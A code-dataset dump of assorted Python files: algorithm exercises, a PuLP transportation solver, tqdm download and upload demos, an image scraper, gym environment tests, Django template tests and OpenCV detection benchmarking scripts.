blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30 values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2 values | text stringlengths 12 5.47M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
136a506b41edb36a805ed803e243f6ed4c0fb81b | Python | adityakangune/HackerRank-Problem-Solving | /Problem Solving/Algorithms/Implementation/Equalize the Array.py | UTF-8 | 224 | 3.140625 | 3 | [] | no_license | n = int(input())
ar = list(map(int, input().split()))
dict = {}
for i in ar:
dict[ar.count(i)] = i
most = max(dict.keys())
element = dict[most]
c = 0
for i in ar:
if i != element:
c += 1
print(c)
| true |
fada82d136481b5632442512d3a6c09638432151 | Python | suetokimaki/python | /Operations Research/transportation_problem_min.py | UTF-8 | 1,311 | 3.390625 | 3 | [] | no_license | # 解运输问题最优最小运费,产销平衡
import pulp
import numpy as np
from pprint import pprint
def transportation_problem(costs, x_max, y_max):
row = len(costs)
col = len(costs[0])
prob = pulp.LpProblem('Transportation Problem', sense=pulp.LpMinimize) #建模
var = [[pulp.LpVariable(f'x{i}{j}', lowBound=0, cat=pulp.LpInteger) #定义约束变量
for j in range(col)] for i in range(row)]
def flatten(x): return [y for l in x for y in flatten(
l)] if type(x) is list else [x]
prob += pulp.lpDot(flatten(var), costs.flatten()) #目标函数
for i in range(row):
prob += (pulp.lpSum([var[i][j] for j in range(col)]) == x_max[i]) #约束条件等式,产销平衡
for j in range(col):
prob += (pulp.lpSum([var[i][j] for i in range(row)]) == y_max[j])
prob.solve()
print(prob)
return {'objective': pulp.value(prob.objective), 'var': [[pulp.value(var[i][j]) for j in range(col)] for i in range(row)]}
if __name__ == '__main__':
costs = np.array([[90, 70, 100],
[80, 65, 80]])
max_chan = [200, 250]
max_xiao = [100, 150, 200]
res = transportation_problem(costs, max_chan, max_xiao)
print(f'min={res["objective"]}')
print('value:')
pprint(res['var'])
| true |
69116f0a8dc6704cb13a26eaa5b5bbd39b181628 | Python | ysoftman/test_code | /python/progress_bar_tqdm.py | UTF-8 | 5,052 | 2.703125 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
# author: ysoftman
# python version : 3.x
# desc : tqdm progress bar test
# tqdm
# https://github.com/tqdm/tqdm
# pip install tqdm aiofiles aiohttp
from tqdm import tqdm
import requests, time, os
import asyncio, aiofiles, aiohttp
def sample():
for x in tqdm(["a", "b", "c", "d"]):
time.sleep(0.2)
for x in tqdm(range(10)):
time.sleep(0.1)
pbar = tqdm(["a", "b", "c", "d"])
for x in pbar:
time.sleep(0.2)
# 현재 진행중인 x 왼쪽에 설명 표시
pbar.set_description(f"Processing {x}")
def download_test(url):
# 받을 전체 크기 파악
response = requests.head(url)
# print(response.headers)
if response.headers.get("Content-Length") == None:
print(f"[HEAD] can't find Content-Length header")
else:
content_length = int(response.headers.get("Content-Length"))
print(f"[HEAD] Content-Length:{content_length}")
response = requests.get(url, stream=True)
if response.headers.get("Content-Length") == None:
print(f"[GET] can't find Content-Length header")
else:
content_length = int(response.headers.get("Content-Length"))
print(f"[GET] Content-Length:{content_length}")
# unit : byte (디폴트: 아이템(it))
# unit_scale : 단위가 커지면 자동으로 단위 변경
# total : 전체 크기
# desc : 왼쪽에 설명 표시
# mininterval: 최소 갱신 주기
pbar = tqdm(
unit="B",
unit_scale=True,
total=content_length,
desc="[download]" + url,
mininterval=0.1,
)
# iter_content() 는 요청 응답을 chunk 단위로 반복한다.
# 응답 받은 만큼 pbar 업데이트하여 진행(request 시 stream=True 필요)
received = 0
for chunk in response.iter_content(chunk_size=1024 * 100):
# content_length 넘어가도록 업데이트되면 progressbar가 지워지는것을 방지
if received + len(chunk) <= content_length:
pbar.update(len(chunk))
received += len(chunk)
pbar.update(content_length - received)
async def read_file(filename):
file_size = os.path.getsize(filename)
# unit : byte (디폴트: 아이템(it))
# unit_scale : 단위가 커지면 자동으로 단위 변경
# total : 전체 크기
# desc : 왼쪽에 설명 표시
# mininterval: 최소 갱신 주기
pbar = tqdm(
unit="B",
unit_scale=True,
total=file_size,
desc="[upload]" + filename,
mininterval=0.1,
)
chunk_size = int(file_size / 100)
read_chunk_size = 0
async with aiofiles.open(filename, "rb") as f:
while read_chunk_size < file_size:
chunk = await f.read(chunk_size)
# 현재 읽은 데이터 리턴
yield chunk
read_chunk_size += len(chunk)
pbar.update(len(chunk))
# aiohttp.ClientSession
# <https://docs.aiohttp.org/en/stable/client_quickstart.html>
# <https://docs.aiohttp.org/en/stable/client_quickstart.html#streaming-uploads>
async def upload_test(aiohttpSession, url, filename):
try:
basic_auth = aiohttp.BasicAuth(login="ysoftman", password="test123")
# default timeout is 300 seconds(5min), None 이나 0으로 하면 타임아웃 없음
# https://github.com/aio-libs/aiohttp/pull/5529/files
timeout = aiohttp.ClientTimeout(total=None)
# set header below to hang problem with wsgidav server(https://github.com/mar10/wsgidav)
# https://yoonbh2714.blogspot.com/2022/07/webdav-chunked-size.html
# headers = {}
# headers["X_EXPECTED_ENTITY_LENGTH"] = repr(os.fstat(fileobj.fileno()).st_size) # fileobject case
# headers["X_EXPECTED_ENTITY_LENGTH"] = repr(os.path.getsize(filename))
# headers["User-Agent"] = "Darwin"
# async for d in read_file(filename):
# print(d)
# read_file 로 읽은 데이터만큼 전송
async with aiohttpSession.put(
url=url, auth=basic_auth, timeout=timeout, data=read_file(filename)
) as res:
return res
except Exception as e:
print(e)
async def upload_main():
aiohttpSession = aiohttp.ClientSession()
# 세션은 한번 생성하고 upload_main() 가 종료될때까지 재사용한다.
async with aiohttp.ClientSession() as aiohttpSession:
# 비동기로 chunk 만큼 파일 데이터를 읽어가며 업로드한다.
for i in range(3):
await upload_test(
aiohttpSession, "https://httpbin.org/put", "ysoftman_10MB"
)
if __name__ == "__main__":
sample()
download_test("https://www.youtube.com")
# 업로드 테스트용 더미 파일 생성
os.system("dd if=/dev/urandom of=ysoftman_10MB bs=1024*1024 count=10")
# 다음 구문은 asyncio.run() 로 대체가능
# loop = asyncio.get_event_loop()
# loop.run_until_complete(upload_main())
asyncio.run(upload_main())
os.remove("ysoftman_10MB")
| true |
f624d5591e770d2f13f73a556da895ca4dc29c91 | Python | BLOODMAGEBURT/spiderdemo | /huaban.py | UTF-8 | 785 | 2.609375 | 3 | [] | no_license | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import requests
import json
from contextlib import closing
chapters = requests.get(url='https://unsplash.com/napi/collections/'
'1065976/photos?page=1&per_page=20&order_by=latest', verify=False)
# print(chapters.text)
json_res = json.loads(chapters.text)
print('开始下载了……')
for url in json_res:
src_id = url['id']
download_url = url['links']['download']+'?force=true'
with closing(requests.get(url=download_url, verify=False, stream=True)) as res:
with open('%s.jpg' % src_id, 'wb') as fd:
print('下载新的……')
for chunk in res.iter_content(chunk_size=1024):
if chunk:
fd.write(chunk)
print('下载完了……')
| true |
36685cfbc969d7845effb218aca979f4e65ee912 | Python | hex-plex/KiloBot-MultiAgent-RL | /env_test.py | UTF-8 | 3,401 | 2.53125 | 3 | [
"MIT"
] | permissive | import gym
import gym_kiloBot
import time
import cv2
import numpy as np
def test1():
print("This should run the env with out any render")
env = gym.make("kiloBot-v0",n=10,screen_width=500,screen_heigth=500,render=False)
env.reset()
a = env.dummy_action(0.1,5)
for i in range(1000):
_,_,_,o=env.step([a]*env.n)
out = o['critic_input']
cv2.imshow("asdf",out)
cv2.waitKey(10)
if i%100==0:
env.reset()
time.sleep(0.05)
#env.close()
time.sleep(0.2)
cv2.destroyAllWindows()
return True
def test2():
print("This should run the env with render")
env = gym.make("kiloBot-v0",n=10,screen_width=500,screen_heigth=500,radius=5)
env.reset()
a = env.dummy_action(0.1,5)
for i in range(1000):
env.step([a]*env.n);env.render();
if i%100==0:
env.reset()
time.sleep(0.05)
time.sleep(0.01)
env.reset()
env.close()
time.sleep(0.2)
return True
def test3():
print("This should run the env and be able to fetch all the graphs")
env = gym.make("kiloBot-v0",n=10,screen_width=500,screen_heigth=500,radius=5)
env.reset()
a = env.dummy_action(0.1,5)
for i in range(500):
env.step([a]*env.n);env.render();
env.graph_obj_distances()
print(len(env.module_queue),"\n",env.module_queue)
env.module_queue = []
if i%100==0:
env.reset()
time.sleep(0.05)
time.sleep(0.05)
env.reset()
env.close()
time.sleep(0.2)
return True
def test4():
print("This should check for the histogram and the optimal region")
env = gym.make("kiloBot-v0",n=10,screen_width=500,screen_heigth=500,radius=5)
env.reset()
a = env.dummy_action(0.1,5)
for i in range(500):
env.step([a]*env.n);env.render();
env.graph_obj_distances()
hist = env.fetch_histogram()
print(hist,"\n",hist.shape)
env.module_queue = []
if i%100==0:
env.reset()
time.sleep(0.05)
time.sleep(0.05)
env.reset()
env.close()
time.sleep(0.2)
return True
def test5():
print("This should check for the localized target with and with the critic knowing (presence in the image)")
env = gym.make("kiloBot-v0",n=10,objective="localization",screen_width=500,screen_heigth=500,radius=5)
env.reset()
a = env.dummy_action(0.1,5)
for i in range(1000):
observation,reward,done,info = env.step([a]*env.n);env.render();
print(info["localization_bit"],"\n",info["target_distance"],"\n",info["neighbouring_bit"])
if i%100==0:
env.reset()
time.sleep(0.05)
time.sleep(0.01)
env.reset()
env.close()
time.sleep(0.2)
return True
if __name__=="__main__":
testes = [test2,test3,test4,test5] ## dont have non render mode with render mode environement in the same session it causes a lot of problem
print("I Have not completely designed the test to be user freind but just as a output of the env variable \n \t\t ^\_('_')_/^\n\n ");time.sleep(1)
result = [0]*len(testes)
for i,test in enumerate(testes):
res = test()
print("test"+str(i)+" - results "+("Passed!" if res else "Failed!"))
result[i] = int(res)
print("Passed "+str(sum(result))+"/"+str(len(testes))+" tests !")
| true |
856144167e6319faa11f3805ba36a45c93e15e60 | Python | daniele21/DL_soccer_prediction_v2 | /core/file_manager/saving.py | UTF-8 | 676 | 2.546875 | 3 | [
"MIT"
] | permissive | import torch
import json
import pickle
from scripts.utils.utils import ensure_folder
def save_json(json_dict, filepath):
with open(filepath, 'w') as j:
json.dump(json_dict, j, indent=4)
j.close()
return
def save_str_file(content, filepath, mode='a'):
with open(filepath, mode) as f:
f.write(content)
f.close()
return
def save_model(model, filepath):
save_object(model, filepath)
# print(f'> Saving model at {filepath}')
return filepath
def save_object(my_object, filepath):
torch.save(my_object, filepath)
# print(f'> Saving object at {filepath}')
return filepath
| true |
df808b7992685446bba9adb2c1665d9ae18b0b27 | Python | SergioJune/leetcode_for_python | /binary_search/50.py | UTF-8 | 791 | 3.453125 | 3 | [] | no_license | """
实现 pow(x, n) ,即计算 x 的 n 次幂函数。
示例 1:
输入: 2.00000, 10
输出: 1024.00000
示例 2:
输入: 2.10000, 3
输出: 9.26100
示例 3:
输入: 2.00000, -2
输出: 0.25000
解释: 2-2 = 1/22 = 1/4 = 0.25
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/powx-n
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
"""
# 非递归解法
class Solution:
def myPow(self, x: float, n: int) -> float:
sign = 0 if n < 0 else 1
n = abs(n)
if n == 0:
return 1
res = 1
x_con = x
while n > 0:
if n&1:
res *= x_con
x_con *= x_con
n //= 2
return res if sign else 1/res
| true |
976bf8e97e5986652e2bb6e2da8707cd3b08e90a | Python | Aasthaengg/IBMdataset | /Python_codes/p03729/s665666994.py | UTF-8 | 106 | 3.1875 | 3 | [] | no_license | a, b, c = [i for i in input().split()]
if a[-1]==b[0] and b[-1]==c[0]:
print("YES")
else:
print("NO") | true |
3e51ba721991f43bb1fa568c8400778079f1aa02 | Python | skripkar/noc | /main/tests/templatetags.py | UTF-8 | 1,624 | 2.78125 | 3 | [
"BSD-3-Clause"
] | permissive | # -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Template tags test
# ---------------------------------------------------------------------
# Copyright (C) 2007-2011 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Django modules
from django import template
# NOC modules
from noc.lib.test import NOCTestCase
PYTHON1_TPL = """
{% load python %}
Before:
x={{ x }}
y={{ y }}
{% python %}
context["x"] += 3
context["y"] = 2 * context["x"]
render("Python code completed")
{% endpython %}
x={{ x }}
y={{ y }}
"""
PYTHON1_OUT = """
Before:
x=1
y=
Python code completed
x=4
y=8
"""
PYTHON2_TPL = """
{% load python %}
{% python %}
for i in range(context["n"]):
rendernl("Line #%d" % i)
{% endpython %}
"""
PYTHON2_OUT = """
Line #0
Line #1
Line #2
"""
PYTHON3_TPL = """
{% load python %}
{% var v1 internal %}
v={{v}}
{% python %}
context["v1"] = 2 * context["v"] + 3
{% endpython %}
v1={{v1}}
"""
PYTHON3_OUT = """
v=2
v1=7
"""
class TemplateTestCase(NOCTestCase):
def render(self, tpl, context={}):
ctx = template.Context(context)
return template.Template(tpl).render(ctx)
def test_python(self):
"""
{% python %} tag test
:return:
"""
self.assertEquals(self.render(PYTHON1_TPL, {"x": 1}),
PYTHON1_OUT)
self.assertEquals(self.render(PYTHON2_TPL, {"n": 3}),
PYTHON2_OUT)
self.assertEquals(self.render(PYTHON3_TPL, {"v": 2}),
PYTHON3_OUT)
| true |
bf6f9e58bc4b1431756ced0bf3701c5bbb08468e | Python | spacedentist/pyimmutable | /pyimmutable/tests/test_equality.py | UTF-8 | 2,667 | 3.234375 | 3 | [
"MIT"
] | permissive | import unittest
from pyimmutable import ImmutableDict, ImmutableList
class TestEquality(unittest.TestCase):
def test_strict_equality(self):
"""
pyimmutable has stricter equality requirements than usual.
"""
l1 = ImmutableList([1, 2, 3])
l2 = ImmutableList([1, 2, 3.0])
self.assertFalse(l1 is l2)
self.assertNotEqual(l1, l2)
self.assertEqual(l1.count(3), 1)
self.assertEqual(l1.count(3.0), 0)
self.assertEqual(l2.count(3), 0)
self.assertEqual(l2.count(3.0), 1)
self.assertEqual(l1.index(3), 2)
self.assertEqual(l2.index(3.0), 2)
with self.assertRaises(ValueError):
l1.index(3.0)
with self.assertRaises(ValueError):
l2.index(3)
def test_tuple(self):
key1 = ("x" * 10000,)
key2 = (("x" * 9999 + "x"),)
self.assertTrue(type(key1) is tuple)
self.assertTrue(type(key2) is tuple)
self.assertEqual(key1, key2)
if key1 is key2:
self.skipTest(
"failed to construct two different tuple objects "
"with same value"
)
d = ImmutableDict({key1: 123})
self.assertEqual(d.get(key1), 123)
self.assertEqual(d.get(key2), 123)
self.assertTrue(key1 in d)
self.assertTrue(key2 in d)
def test_string(self):
key1 = "x" * 10000
key2 = "x" * 9999 + "x"
self.assertTrue(type(key1) is str)
self.assertTrue(type(key2) is str)
self.assertEqual(key1, key2)
if key1 is key2:
self.skipTest(
"failed to construct two different string objects "
"with same value"
)
d = ImmutableDict({key1: 123})
self.assertEqual(d.get(key1), 123)
self.assertEqual(d.get(key2), 123)
self.assertTrue(key1 in d)
self.assertTrue(key2 in d)
self.assertFalse(key1.encode("ascii") in d)
def test_bytes(self):
key1 = b"x" * 10000
key2 = b"x" * 9999 + b"x"
self.assertTrue(type(key1) is bytes)
self.assertTrue(type(key2) is bytes)
self.assertEqual(key1, key2)
if key1 is key2:
self.skipTest(
"failed to construct two different bytes objects "
"with same value"
)
d = ImmutableDict({key1: 123})
self.assertEqual(d.get(key1), 123)
self.assertEqual(d.get(key2), 123)
self.assertTrue(key1 in d)
self.assertTrue(key2 in d)
self.assertFalse(key1.decode("ascii") in d)
if __name__ == "__main__":
unittest.main()
| true |
d202ad9bb445e46f5fe9c9267affaba8bbd61920 | Python | 276921237/CGM-UartPrintVisual | /example8_cgm.py | UTF-8 | 8,324 | 2.625 | 3 | [] | no_license | # 代码功能:
# 1.以分号为间隔,按列读取文本文件
# 2.将读取到的数据转换成int类型数据
# 3.将int类型数据以折线图形式展示出来
# 4.由于原始数据可能有大的突变不方便图形暂时,在代码中可以限制最大值,可修改 max_pdd 变量来控制最大值,
# 5.也可以设定 max_visual_value_plus , max_visual_value_minus 来控制Y轴的最大正,负显示值
# 6.数据格式如下,如果python运行报错,请检查数据格式,特别是在中途是否有打印输入:
# [12-13 16:22:07]3d87:pdd:0004,000a,0004,8006;pll:6;da:7df3
# [12-13 16:22:08]3d88:pdd:0004,000b,0004,8007;pll:6;da:7df3
# [12-13 16:22:09]3d89:pdd:0003,000a,0003,8007;pll:6;da:7df3
# [12-13 16:22:10]3d8a:pdd:0005,000b,0005,8006;pll:6;da:7df3
# [12-13 16:22:11]3d8b:pdd:0004,000b,0004,8007;pll:6;da:7df3
# [12-13 16:22:12]3d8c:pdd:0003,000b,0003,8008;pll:6;da:7df3
# [12-13 16:22:13]3d8d:pdd:0005,000b,0005,8006;pll:6;da:7df3
# [12-13 16:22:14]3d8e:pdd:0004,000b,0004,8007;pll:6;da:7df3
# [12-13 16:22:15]3d8f:pdd:0003,000b,0003,8008;pll:6;da:7df3
# [12-13 16:22:16]3d90:pdd:0005,000b,0005,8006;pll:6;da:7df3
# [12-13 16:22:17]3d91:pdd:0004,000b,0004,8007;pll:6;da:7df3
# [12-13 16:22:18]3d92:pdd:0003,000b,0003,8008;pll:6;da:7df3
# [12-13 16:22:19]3d93:pdd:0005,000b,0005,8006;pll:6;da:7df3
# [12-13 16:22:20]3d94:pdd:0004,000b,0004,8007;pll:6;da:7df3
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import datetime
import tkinter as tk
from tkinter import filedialog
# 设定最大PDD值,在取数据时如果某个值大于 max_pdd 则修改该值为 max_pdd
max_pdd = 10000
# 设定 max_visual_value_plus 来控制Y轴的最大显示值
max_visual_value_plus = 200
# 设定 max_visual_value_minus 来控制Y轴的最小显示值
max_visual_value_minus = -200
# 获取文件
root = tk.Tk()
root.withdraw()
origin_data_file = filedialog.askopenfilename()
# 指定文件名
# file_path = 'CGM1216_2145 4B0.log'
file_path = origin_data_file
# 指定数据列名称
column_names = ['index1' , 'index2' , 'index3']
print('%s: program start' % datetime.datetime.now())
# 读取数据文件,以';'为间隔
print("open file: %s" % file_path)
data = pd.read_csv(file_path , header = None , sep = ';' , names = column_names)
print('%s: read csv complete' % datetime.datetime.now())
#################################################
# 第一组PDD值
# cut the data.indexx string list
y_pdd1 = []
sign_pdd1 = []
for i in range(0, len(data.index)):
y_pdd1.append(data.index1[i][-18:-15])
for i in range(0, len(data.index)):
sign_pdd1.append(data.index1[i][-19])
# translate the origindata into integer
y_pdd1_dec = []
for i in range(0 , len(data.index)):
z = 8*int(y_pdd1[i] , base = 16)
if sign_pdd1[i] == '8' or sign_pdd1[i] == 'f':
if z >= max_pdd:
y_pdd1_dec.append(-max_pdd)
else:
y_pdd1_dec.append(-z)
else:
if z >= max_pdd:
y_pdd1_dec.append(max_pdd)
else:
y_pdd1_dec.append(z)
print('%s: generate pdd_data1 complete' % datetime.datetime.now())
#################################################
# 第二组PDD值
# cut the data.indexx string list
y_pdd2 = []
sign_pdd2 = []
for i in range(0, len(data.index)):
y_pdd2.append(data.index1[i][-13:-10])
for i in range(0, len(data.index)):
sign_pdd2.append(data.index1[i][-14])
# translate the origindata into integer
y_pdd2_dec = []
for i in range(0 , len(data.index)):
z = 8*int(y_pdd2[i] , base = 16)
if sign_pdd2[i] == '8' or sign_pdd2[i] == 'f':
if z >= max_pdd:
y_pdd2_dec.append(-max_pdd)
else:
y_pdd2_dec.append(-z)
else:
if z >= max_pdd:
y_pdd2_dec.append(max_pdd)
else:
y_pdd2_dec.append(z)
print('%s: generate pdd_data2 complete' % datetime.datetime.now())
#################################################
# 第三组PDD值
# cut the data.indexx string list
y_pdd3 = []
sign_pdd3 = []
for i in range(0, len(data.index)):
y_pdd3.append(data.index1[i][-8:-5])
for i in range(0, len(data.index)):
sign_pdd3.append(data.index1[i][-9])
# translate the origindata into integer
y_pdd3_dec = []
for i in range(0 , len(data.index)):
z = 8*int(y_pdd3[i] , base = 16)
if sign_pdd3[i] == '8' or sign_pdd3[i] == 'f':
if z >= max_pdd:
y_pdd3_dec.append(-max_pdd)
else:
y_pdd3_dec.append(-z)
else:
if z >= max_pdd:
y_pdd3_dec.append(max_pdd)
else:
y_pdd3_dec.append(z)
print('%s: generate pdd_data3 complete' % datetime.datetime.now())
#################################################
# 第四组PDD值
# cut the data.indexx string list
y_pdd4 = []
sign_pdd4 = []
for i in range(0, len(data.index)):
y_pdd4.append(data.index1[i][-3:])
for i in range(0, len(data.index)):
sign_pdd4.append(data.index1[i][-4])
# translate the origindata into integer
y_pdd4_dec = []
for i in range(0 , len(data.index)):
z = 8*int(y_pdd4[i] , base = 16)
if sign_pdd4[i] == '8' or sign_pdd4[i] == 'f':
if z >= max_pdd:
y_pdd4_dec.append(-max_pdd)
else:
y_pdd4_dec.append(-z)
else:
if z >= max_pdd:
y_pdd4_dec.append(max_pdd)
else:
y_pdd4_dec.append(z)
print('%s: generate pdd_data4 complete' % datetime.datetime.now())
#################################################
# PLL值
# cut the data.indexx string list
y_pll = []
for i in range(0, len(data.index)):
y_pll.append(data.index2[i][-1])
# translate the origindata into integer
y_pll_dec = []
for i in range(0 , len(data.index)):
y_pll_dec.append(int(y_pll[i] , base=16))
##############################################
# DA值
# cut the data.indexx string list
y_davalue = []
for i in range(0, len(data.index)):
y_davalue.append(data.index3[i][-4:])
# translate the origindata into integer
y_davalue_dec = []
for i in range(0 , len(data.index)):
y_davalue_dec.append(int(y_davalue[i] , base=16))
####################################################
print('%s: generate all data complete' % datetime.datetime.now())
x = np.linspace(1, len(data.index), len(data.index))
# 创建全部PDD值曲线
plt.figure()
plt.title("PDD VALUE FIGURE")
plt.plot(x,y_pdd1_dec,label = 'REF_VS_LOC')
plt.plot(x,y_pdd2_dec,label = '4B0_VS_LOC')
plt.plot(x,y_pdd3_dec,label = 'UBLOX_VS_LOC')
plt.plot(x,y_pdd4_dec,label = '4B0_VS_UBLOX')
plt.legend()
# 限制Y轴范围
plt.ylim(max_visual_value_minus , max_visual_value_plus)
# 创建PDD1值曲线
plt.figure()
plt.title("REF_VS_LOC VALUE FIGURE")
plt.plot(x,y_pdd1_dec,label = 'REF_VS_LOC')
plt.legend()
# 限制Y轴范围
plt.ylim(max_visual_value_minus , max_visual_value_plus)
# 创建 PDD2 值曲线
plt.figure()
plt.title("4B0_VS_LOC VALUE FIGURE")
plt.plot(x,y_pdd2_dec,label = '4B0_VS_LOC')
plt.legend()
# 限制Y轴范围
plt.ylim(max_visual_value_minus , max_visual_value_plus)
# 创建 PDD3 值曲线
plt.figure()
plt.title("UBLOX_VS_LOC VALUE FIGURE")
plt.plot(x,y_pdd3_dec,label = 'UBLOX_VS_LOC')
plt.legend()
# 限制Y轴范围
plt.ylim(max_visual_value_minus , max_visual_value_plus)
# 创建 PDD4 值曲线
plt.figure()
plt.title("4B0_VS_UBLOX VALUE FIGURE")
plt.plot(x,y_pdd4_dec,label = '4B0_VS_UBLOX')
plt.legend()
# 限制Y轴范围
plt.ylim(max_visual_value_minus , max_visual_value_plus)
# 创建PLL 、DA 以及 REF_VS_LOC PDD 曲线
plt.figure()
plt.subplot(311)
# plt.title("PLL VALUE FIGURE")
plt.plot(x,y_pll_dec,label = 'pll value')
plt.legend()
plt.subplot(312)
# plt.title("DA VALUE FIGURE")
plt.plot(x,y_davalue_dec , label = 'da value')
plt.legend()
plt.subplot(313)
# plt.title("REF_VS_LOC FIGURE")
plt.plot(x,y_pdd1_dec , label = 'REF_VS_LOC')
plt.legend()
# 限制Y轴范围
plt.ylim(max_visual_value_minus , max_visual_value_plus)
print('%s: generate figure complete' % datetime.datetime.now())
plt.show()
| true |
3faaa02c8d9037737c28a0e17003936c75878e45 | Python | Nyamkhuub/oop-python | /linkedlist/list.py | UTF-8 | 1,386 | 3.65625 | 4 | [] | no_license | class Node:
def __init__(self, value):
self.value = value
self.next = None
class List:
def __init__(self, *elements):
self.header = None
for element in elements:
self.add(element)
def add(self, value):
if self.header == None:
self.header = Node(value)
else:
curr = self.header
while curr.next != None:
curr = curr.next
curr.next = Node(value)
def see(self):
curr = self.header
while(curr != None):
print(curr.value)
curr = curr.next
def remove(self, value):
curr = self.header
prev = self.header
hasElement = False
while curr != None:
if curr.value == value:
if curr == self.header:
self.header = self.header.next
hasElement = True
break
prev.next = curr.next
hasElement = True
break
prev = curr
curr = curr.next
if hasElement:
print('Amjilttai ustgalaa!')
else:
print('tuhain haij baigaa utga listend baihgui bna')
test = List(1, 2, 3, 4, 'ene bol test')
test.see()
test.add('testing add function')
print('-----------')
test.remove(1)
print('-----------')
test.see()
| true |
2fd11f0ace4c289c5c1d6c246dabc5465d4ea264 | Python | ikuyarihS/Charlotte | /tests/commands/top_test.py | UTF-8 | 1,279 | 2.9375 | 3 | [] | no_license | import discord
from commands import top
from collections import namedtuple
import io
MockMessage = namedtuple("Message", ["channel_id", "content"])
MockUser = namedtuple("User", ["count", "username"])
class MockDatabase(object):
def __init__(self):
pass
def get_top_members_per_message_count(self, top_n):
users = []
for i in range(top_n):
user = MockUser(i, "user%d" % i)
users.append(user)
return users
def test_top_too_many_users():
incoming_message = MockMessage("my_channel_id_123", "!c/top/10000")
result = top(incoming_message, None, 10000)
assert isinstance(result, discord.Message)
assert result.content == "Fuck off mate, bandwidth ain't free."
assert result.channel_id == incoming_message.channel_id
def test_top():
incoming_message = MockMessage("my_channel_id_123", "!c/top/10000")
db = MockDatabase()
result = top(incoming_message, db, 5)
assert isinstance(result, discord.Message)
assert result.content == ""
assert result.channel_id == incoming_message.channel_id
assert result.attachment != None
assert len(result.attachment) == 2
assert result.attachment[0] == "top.png"
assert isinstance(result.attachment[1], io.BytesIO)
| true |
c746b8c9dc5df301228ac2bc3cb5fa395fedf62c | Python | gabriaraujo/uri | /src/python/1013.py | UTF-8 | 161 | 3.46875 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
a, b, c = input().split()
a = int(a)
b = int(b)
c = int(c)
list = [a, b, c]
list.sort()
print("%d eh o maior" %list[2])
| true |
843d5c7eac9bbc8a97c0e2293da841cb40ef4f06 | Python | trickfountain/biodiv | /biodiv/validation.py | UTF-8 | 4,550 | 2.953125 | 3 | [] | no_license | import cv2 as cv
import numpy as np
from biodiv.detection import detect_ROI, V1, resize_img
from biodiv.utils import find_extContours, display
def cnts_benchmark(img_src, detector=detect_ROI):
'''Calculate detection recall and precision for a given detector
Uses pure red (0, 0, 255) dots for labelling. Input expected
is a color, 3 channels image but where only the dots are colored.
A detector is the step that takes a pre-processed image and finds
Regions Of Interests.
Finds the center of each circle using Moment and checks if
center is within the bounded rectangle of an ROI.
'''
img = cv.imread(img_src, 1)
_, thresh1 = cv.threshold(img, 50, 255, cv.THRESH_BINARY)
b, _, r = cv.split(thresh1)
targets = r-b
t_cnts = find_extContours(targets)
targets = []
for i, cnt in enumerate(t_cnts):
M = cv.moments(cnt)
cx, cy = int(M['m10']/M['m00']), int(M['m01']/M['m00'])
targets.append((i, (cx, cy)))
detected = detector(b)
det_cnts = []
for i, (tl, br) in enumerate(detected):
canvas = np.zeros(img.shape[0:2], np.uint8)
cv.rectangle(canvas, tuple(tl), tuple(br), 255, 3)
cnts = find_extContours(canvas)
det_cnts.append((i, cnts[0]))
matches = []
for det_id, roi_cnt in det_cnts:
for target_id, center in targets:
result = cv.pointPolygonTest(roi_cnt, center, False)
if result == 1:
matches.append((det_id, target_id))
tot_matches = len(matches)
un_matches = len(set([tup[1] for tup in matches]))
tot_targets = len(targets)
tot_cnts = len(det_cnts)
recall = un_matches/len(targets)*100 if tot_matches else 0
precision = un_matches/len(det_cnts)*100 if det_cnts else 0
results = {
'recall': recall,
'precision': precision,
'tot_matches': tot_matches,
'un_matches': un_matches,
'tot_targets': tot_targets,
'tot_cnts': tot_cnts
}
return results
# TODO: det_benchmark and cnts_benchmark should probably be the
# the same function, just confused about which function should return what.
def det_benchmark(img_src, img_lab, detector=V1):
# TODO: docstring prob needs fixing
'''Calculate detection recall and precision for a given detector
Uses pure red (0, 0, 255) dots for labelling. Input expected
is a color, 3 channels image but where only the dots are colored.
A detector is the step that takes a pre-processed image and finds
Regions Of Interests.
Finds the center of each circle using Moment and checks if
center is within the bounded rectangle of an ROI.
'''
img_res, ROIs = detector(img_src)
img_res_width = img_res.shape[1]
img_lab = cv.imread(img_lab, 1)
img_lab = resize_img(img_lab, img_res_width)
img_lab = cv.cvtColor(img_lab, cv.COLOR_RGB2BGR)
_, thresh1 = cv.threshold(img_lab, 50, 255, cv.THRESH_BINARY_INV)
b, _, r = cv.split(thresh1)
dots = r-b
t_cnts = find_extContours(dots)
targets = []
for i, cnt in enumerate(t_cnts):
M = cv.moments(cnt)
cx, cy = int(M['m10']/M['m00']), int(M['m01']/M['m00'])
targets.append((i, (cx, cy)))
det_cnts = []
for i, (tl, br) in enumerate(ROIs):
canvas = np.zeros(img_res.shape[0:2], np.uint8)
cv.rectangle(canvas, tuple(tl), tuple(br), 255, -1)
contours = find_extContours(canvas)
det_cnts.append((i, contours[0]))
matches = []
for det_id, roi_cnt in det_cnts:
for target_id, center in targets:
result = cv.pointPolygonTest(roi_cnt, center, False)
if result == 1:
matches.append((det_id, target_id))
tot_matches = len(matches)
un_matches = len(set([tup[1] for tup in matches]))
tot_targets = len(targets)
tot_cnts = len(det_cnts)
recall = un_matches/len(targets)*100 if tot_matches else 0
precision = un_matches/len(det_cnts)*100 if det_cnts else 0
results = {
'recall': recall,
'precision': precision,
'tot_matches': tot_matches,
'un_matches': un_matches,
'tot_targets': tot_targets,
'tot_cnts': tot_cnts
}
return results
if __name__ == "__main__":
# img_src = 'biodiv/tests/test_images/cats1.jp2'
# img_lab = 'biodiv/tests/test_images/cats1_bw_lab.jp2'
img_src = 'biodiv/tests/test_images/but1.jp2'
img_lab = 'biodiv/tests/test_images/but1_lab.jp2'
print(det_benchmark(img_src, img_lab))
